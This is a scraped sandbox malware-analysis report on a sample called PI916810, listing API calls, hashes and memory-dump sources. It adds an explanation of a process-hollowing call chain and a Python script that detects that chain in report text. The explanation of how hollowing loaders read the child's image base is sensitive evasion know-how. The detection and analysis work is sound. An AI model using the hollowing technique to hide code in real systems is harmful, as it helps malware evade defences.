• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _memmove
• String ID: AU3!P/O$EA06
• API String ID: 4104443479-2756084753
• Opcode ID: 3b02af6da6bdfacb3b2fbea91d61ec133972bde02f7f1b66f699da3792269b22
• Instruction ID: ffb702374604ef194c7b0c49f94005bf1853b1647b07a0978d4ea880466d055c
• Instruction Fuzzy Hash: E9416C71A04254ABCF215B64C8517BF7F66AB81304F28447BFC429A282F52E9D41C7AB
APIs
• _memset.LIBCMT ref: 0049EE62
• GetOpenFileNameW.COMDLG32(?), ref: 0049EEAC
  • Part of subcall function 004648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004648A1,?,?,004637C0,?), ref: 004648CE
  • Part of subcall function 004809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004809F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: f00dd1b3bcddc4b8b16ddd562a7a02faf6d955bee9111d5ed42a617fbc76a687
• Instruction ID: 8cc8915424f746d48afd2840481bc2e068e37f8d8be118732bd02168fcfc026a
• Instruction Fuzzy Hash: FC21D870A102589BDF11DF95C845BEE7BF8AF49318F00401BE408E7341EBB8598E8FA6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: 2766ff42a3efcd0334871c3d71733419afafe9a9ba2befa4f246ba45551c8ed9
• Instruction ID: 363aecba398ce4d65f09292793c6acfaa1359ef937c3b33f095b64f81d233514
• Instruction Fuzzy Hash: 4801F971804218BEDB68D7A9CC1AFFE7BFCDB01305F00459FF552D2181E5B9AA188764
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 004C9B82
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004C9B99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 0ed6f544afcd4ee497520652e78b8b4b21c078dd9604ea12c3ed960686ae5552
• Instruction ID: dc112648dc979613f79cbbe3a8f7e1b72099fb9b6ce81e40a92b623272138840
                                                                                                                                                                            • Instruction Fuzzy Hash: 54D05E7994030DABDB109B94DC4EFDA7B2CE704700F0042F1BF54990A2DEB565988B96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 943828058d4438776844c0ecc04fe803ea845e59cf8fddbe88ee1938d08a11e2
                                                                                                                                                                            • Instruction ID: 8fc6f66f0280e24900d079149896ae9e36598a9b5264bc3181bd5ec21f2c1ba5
                                                                                                                                                                            • Opcode Fuzzy Hash: 943828058d4438776844c0ecc04fe803ea845e59cf8fddbe88ee1938d08a11e2
                                                                                                                                                                            • Instruction Fuzzy Hash: 33F16970A083019FC714DF29C490A6ABBE5FF88318F14896EF8999B351D735E946CF86
                                                                                                                                                                            APIs
                                                                                                                                                                            • __FF_MSGBANNER.LIBCMT ref: 00485963
                                                                                                                                                                              • Part of subcall function 0048A3AB: __NMSG_WRITE.LIBCMT ref: 0048A3D2
                                                                                                                                                                              • Part of subcall function 0048A3AB: __NMSG_WRITE.LIBCMT ref: 0048A3DC
                                                                                                                                                                            • __NMSG_WRITE.LIBCMT ref: 0048596A
                                                                                                                                                                              • Part of subcall function 0048A408: GetModuleFileNameW.KERNEL32(00000000,005243BA,00000104,?,00000001,00000000), ref: 0048A49A
                                                                                                                                                                              • Part of subcall function 0048A408: ___crtMessageBoxW.LIBCMT ref: 0048A548
                                                                                                                                                                              • Part of subcall function 004832DF: ___crtCorExitProcess.LIBCMT ref: 004832E5
                                                                                                                                                                              • Part of subcall function 004832DF: ExitProcess.KERNEL32 ref: 004832EE
                                                                                                                                                                              • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1372826849-0
                                                                                                                                                                            • Opcode ID: b0e5002bd3c0f41f153c914a04d4f9a234de9b43fa45580063c3ec8f0e199a57
                                                                                                                                                                            • Instruction ID: eb3ff6c190035e15594b170229f38c41e0aada9686afcef5478957b11bbc8361
                                                                                                                                                                            • Opcode Fuzzy Hash: b0e5002bd3c0f41f153c914a04d4f9a234de9b43fa45580063c3ec8f0e199a57
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01F5B5200B15EEE6217B26DC42A2E72988F52B75F500C2FF4019A2C1DE7C9D029BAD
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004C97D2,?,?,?,?,?,00000004), ref: 004C9B45
                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004C9B5B
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,004C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004C9B62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                            • Opcode ID: 6531ffcaab349f09b4f22ccc3169661146cfc4886c9928716e1b97a6cf5ca92e
                                                                                                                                                                            • Instruction ID: eb3baa9a97f6481a73b836381eab82f1ae0f9663b8c6522aca0383d355c6aef2
                                                                                                                                                                            • Opcode Fuzzy Hash: 6531ffcaab349f09b4f22ccc3169661146cfc4886c9928716e1b97a6cf5ca92e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE08632580218B7D7211B54EC49FCA7B28AB05761F108130FB146D0E187B12D15979C
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FA5
                                                                                                                                                                              • Part of subcall function 00482F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00489C64), ref: 00482FA9
                                                                                                                                                                              • Part of subcall function 00482F95: GetLastError.KERNEL32(00000000,?,00489C64), ref: 00482FBB
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FB6
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                                                                                                                            • Instruction ID: 38b5d1a7a5e0c8f73fc5703bd67f6bbc80313cf43ba1e9251dfb7e89539744d2
                                                                                                                                                                            • Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                                                                                                                            • Instruction Fuzzy Hash: A0E0C2B12087104ACA20B639AE00F9717EE0F88318B180C1FB609DB242CE6CE840D22C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                            • API String ID: 0-4196123274
                                                                                                                                                                            • Opcode ID: 31aa9e4889dcdcf3c3df9682763b59c4d184a2034dd79bd34cfb7d5fe646a3ef
                                                                                                                                                                            • Instruction ID: b5b2e1fce57fb9082b6e2499290ecf7591199f07b687987683d436dffb1ca340
                                                                                                                                                                            • Opcode Fuzzy Hash: 31aa9e4889dcdcf3c3df9682763b59c4d184a2034dd79bd34cfb7d5fe646a3ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B2228706087418FC724DF14C494A6ABBE1FF45304F14895EE8869B362E739EC95CB8B
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 856254489-1304234792
APIs
• IsThemeActive.UXTHEME ref: 00464992
  • Part of subcall function 004835AC: __lock.LIBCMT ref: 004835B2
  • Part of subcall function 004835AC: DecodePointer.KERNEL32(00000001,?,004649A7,004B81BC), ref: 004835BE
  • Part of subcall function 004835AC: EncodePointer.KERNEL32(?,?,004649A7,004B81BC), ref: 004835C9
  • Part of subcall function 00464A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00464A73
  • Part of subcall function 00464A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00464A88
  • Part of subcall function 00463B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00463B7A
  • Part of subcall function 00463B4C: IsDebuggerPresent.KERNEL32 ref: 00463B8C
  • Part of subcall function 00463B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,005262F8,005262E0,?,?), ref: 00463BFD
  • Part of subcall function 00463B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00463C81
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004649D2
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00465981,?,?,?,?), ref: 00465E27
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00465981,?,?,?,?), ref: 0049E19C
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 0048594C: __FF_MSGBANNER.LIBCMT ref: 00485963
  • Part of subcall function 0048594C: __NMSG_WRITE.LIBCMT ref: 0048596A
  • Part of subcall function 0048594C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
• std::exception::exception.LIBCMT ref: 0048102C
• __CxxThrowException@8.LIBCMT ref: 00481041
  • Part of subcall function 004887DB: RaiseException.KERNEL32(?,?,?,0051BAF8,00000000,?,?,?,?,00481046,?,0051BAF8,?,00000001), ref: 00488830
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
APIs
  • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
• __lock_file.LIBCMT ref: 0048561B
  • Part of subcall function 00486E4E: __lock.LIBCMT ref: 00486E71
• __fclose_nolock.LIBCMT ref: 00485626
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0046558F,?,?,?,?,?), ref: 004681DA
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0046558F,?,?,?,?,?), ref: 0046820D
  • Part of subcall function 004678AD: _memmove.LIBCMT ref: 004678E9
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
                                                                                                                                                                            • Opcode ID: c58328ed05cb50d2edf68b082eb40b71a980ee797d079adbb72b31a0ec1d4369
                                                                                                                                                                            • Instruction ID: 5e2c686a1f66a6fc591548d092e823da0efe978786e2965844a739a230278f79
                                                                                                                                                                            • Opcode Fuzzy Hash: c58328ed05cb50d2edf68b082eb40b71a980ee797d079adbb72b31a0ec1d4369
                                                                                                                                                                            • Instruction Fuzzy Hash: CC018F31201144BEEB246B26DD56E7B7B5CEB85760F10852AFD05CD191EE219C008666
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010FD1C1
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010FD1E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2438371351-0
                                                                                                                                                                            • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction ID: fb841894abe95b2e87ec4bd238ffe60233907f487c857047c0bfa91d3dc341f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction Fuzzy Hash: EA12DD24E24658C6EB24DF64D8507DEB272EF68300F1090ED910DEB7A5E77A4E81CF5A
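The function at 010FD12B above is the one the report's "Sample uses process hollowing technique" signature points at: it creates a child process, fetches the child's thread context through the Wow64 path, and then performs a 4-byte ReadProcessMemory, which is the usual way a 32-bit loader pulls the image base pointer out of the child's PEB before unmapping and overwriting it. The following script is an added example, not part of the Joe Sandbox report or of its tooling: it parses function records in the report's own "APIs" bullet form and flags any record whose calls contain that CreateProcessW / Wow64GetThreadContext / ReadProcessMemory chain in code order. The sample input is constructed from the lines shown on this page; the list of optional follow-on APIs (NtUnmapViewOfSection, WriteProcessMemory, SetThreadContext, ResumeThread and so on) and the "4-byte read means PEB pointer fetch" heuristic are assumptions about hollowing loaders in general, not something this report states.

```python
"""Flag process-hollowing API chains in Joe Sandbox style function records.

Added example; not part of the Joe Sandbox report. Parses lines of the form
"• <Api>.<Module>(<args>), ref: <addr>" that follow an "APIs" heading and
scores each function record for the hollowing prologue.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Report bullet form, e.g. "• CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B"
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# The three calls the report shows for the function at 010FD12B; all must be
# present, in code (address) order, for a record to be flagged.
REQUIRED = ("CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory")
# Assumption: APIs a hollowing loader typically uses after the prologue.
OPTIONAL = frozenset({"NtUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
                      "Wow64SetThreadContext", "SetThreadContext", "ResumeThread"})


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int  # address of the call site, parsed from "ref:"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into function records, one per 'APIs' heading.

    Records with no parsable API bullets (the report prints an empty 'APIs'
    heading for those) are dropped.
    """
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            current.calls.append(ApiCall(
                api=m["api"], module=m["module"],
                args=[a.strip() for a in m["args"].split(",")],
                ref=int(m["ref"], 16)))
    return [r for r in records if r.calls]


def hollowing_indicators(rec: FunctionRecord) -> List[str]:
    """Return indicator labels for a record; empty list means no chain found."""
    ordered = sorted(rec.calls, key=lambda c: c.ref)
    names = [c.api for c in ordered]
    # Position of each required stage; every stage must exist and appear in order.
    pos = [next((i for i, n in enumerate(names) if n == api), None) for api in REQUIRED]
    if None in pos or pos != sorted(pos):
        return []
    found = ["create+getcontext+read chain"]
    for c in ordered:
        # Heuristic (assumption): a 4-byte read right after fetching the context is
        # consistent with reading the 32-bit image base pointer from the child's PEB.
        if c.api == "ReadProcessMemory" and len(c.args) >= 4 and c.args[3] == "00000004":
            found.append("4-byte ReadProcessMemory")
        if c.api in OPTIONAL:
            found.append(c.api)
    return found


def flag_hollowing(text: str) -> Dict[str, List[str]]:
    """Map first call-site address (as in the report) to indicators for flagged records."""
    result: Dict[str, List[str]] = {}
    for rec in parse_records(text):
        ind = hollowing_indicators(rec)
        if ind:
            result[f"{min(c.ref for c in rec.calls):08X}"] = ind
    return result


# Constructed sample: the two API-bearing records shown on this page, plus the
# surrounding headings the report prints between them.
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010FD1C1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010FD1E3
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00465CF6
Memory Dump Source
APIs
Memory Dump Source
"""

if __name__ == "__main__":
    for addr, indicators in flag_hollowing(SAMPLE_REPORT).items():
        print(addr, ", ".join(indicators))
```

Run on the constructed sample, only the record beginning at 010FD12B is flagged; the SetFilePointerEx record and the empty record are not. Because the report does not show the unmap/write/resume calls for this function, the script reports the prologue chain rather than a complete hollowing sequence; correlating with the report's other signatures (foreign memory writes, thread context modification) is still needed before treating a hit as confirmed.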
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9768c990fb203b094b1a6323caac172897b32d74881450bdfee82522ec177aad
                                                                                                                                                                            • Instruction ID: 13ce9031d1f949e83845862ede42b53772dd03672669ad1d585731f1fa38262d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9768c990fb203b094b1a6323caac172897b32d74881450bdfee82522ec177aad
                                                                                                                                                                            • Instruction Fuzzy Hash: 5461EE7460024AAFCB10DF64D881A6BB7F4EF45304F14843FE9468B642EB78ED59CB5A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e25c071a217eb8b62abf00c898cece267d7a7c6974ca407929fd4978f47574c2
                                                                                                                                                                            • Instruction ID: ed95f7180065dfa72813a57b72bb76dafa4e26dd299668de3001329000eaa1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: e25c071a217eb8b62abf00c898cece267d7a7c6974ca407929fd4978f47574c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D51B334600600AFCF14EF55C991EAE77A5AF45314F15805EF90AAB392DB38ED05CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00465CF6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
